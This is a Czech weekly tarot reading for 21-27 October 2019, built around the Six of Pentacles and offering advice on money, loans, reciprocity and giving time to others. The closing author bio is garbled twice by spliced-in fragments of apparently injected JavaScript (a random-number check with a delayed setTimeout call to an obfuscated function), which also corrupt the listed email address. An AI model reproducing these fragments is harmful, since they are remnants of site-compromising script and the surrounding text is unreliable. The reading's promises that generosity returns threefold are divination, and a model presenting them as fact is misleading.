Ezoterika, Magie,  Tarot

Týdenní čtení z tarotových karet: 21.-27. října 2019

Karta týdne: Šestka mincí

Tento váš týden by se měl odvíjet ve smyslu otázky: Jak mohu do svého života vnést finanční rovnováhu a hmotnou „harmonii“? Anebo možná i harmonii mezi hmotnou a „nehmotnou“ stránkou mého života? Karta Šestka mincí odpovídá na tento dotaz: „Zmíněná harmonie by v tomto období měla být ve vašem životě nastolena“. Minimálně budou v rovnováze částky, které vynaložíte a ty, které obdržíte. Pokud budete skutečně vděční za to, co již máte, ačkoli by to z vašeho úhlu pohledu bylo docela málo, začnete tento týden dostávat víc, neboť vděčnost se vždy hojně vrací.
Budete-li tento týden víc než jindy nakloněni poskytnout někomu půjčku, nejdřív se ubezpečte, že vám bude všechno včas vráceno. Případná půjčka by totiž měla být teď postavena na důvěře a dobré víře, že pokud něco dáváte, skutečně se vám to vrátí dle domluvy. Nemělo by jít o žádné dlouhodobé finanční transakce. Tento týden se doporučuje, pokud tedy vůbec, volit pouze krátkodobá řešení. Zamyslete se však spíš nad tím, jak byste mohli někoho, kdo se na vás obrátí s prosbou o pomoc, podpořit způsobem, který jej přivede k soběstačnosti a schopnosti vydělat si na své potřeby sám nebo sama.
Na druhou stranu, jste-li vy těmi, kdo by mohl potřebovat velkorysost jiných lidí, neodmítejte jejich pomoc, přijměte ji opět – s vděčností. To vám pomůže dostat se opět na nohy a nakonec oplatit pomoc buďto svým časem, nebo jinou formou „reciprocity“. Patříte-li k těm, kteří jsou z času na čas, nebo možná i častěji, odkázání na podporu od ostatních, měli byste tento týden začít hledat cesty, jak se z dlouhodobého hlediska stát samostatnější, soběstačnější. Riziko stálejšího přijímání pomoci jiných totiž spočívá v tom, že se na ni stanete závislí, a přestanete se až natolik snažit skutečně dostat ze stávající situace, aniž byste to vy sami postřehli.

Výzva Šestky mincí na tento týden:
Zkuste si naplno užívat dobrých pocitů spojených s pomocí druhým. I když nejste finančně bohatí, obětujte kupříkladu svůj čas, energii, lásku a psychickou či emoční podporu těm, kteří to potřebují. Poskytování času, poznatků, získaných vědomostí, zručností nebo osobní moudrosti je často víc naplňující a možná i hodnotnější, než rozdávání peněz nebo materiálních darů. Někdy je dar vaší pouhé přítomnosti přijímán se stejnou vděčností, ne-li větší, jako peníze a podobné „hmotné benefity“. Pokud zapochybujete, zda si můžete opravdu dovolit dávat velkoryse ostatním něco ze sebe sama, nezapomeňte, že výzva této karty vychází z potřeby hluboké víry, že každý váš příspěvek, ať je jím cokoli, bude jednou oceněn a vrátí se vám třikrát. I když to nemusí být nevyhnutelně od těch, které jste tak šlechetně obdarovali.

Judita Katona Peschlová, zkušená kartářka, psychoterapeutka, terapeutka andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andělské terapie a lektorka rodinných konstelací, žurnalistka a spisovatelka; www.angelcity.cz, judita.andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andele@gmail.com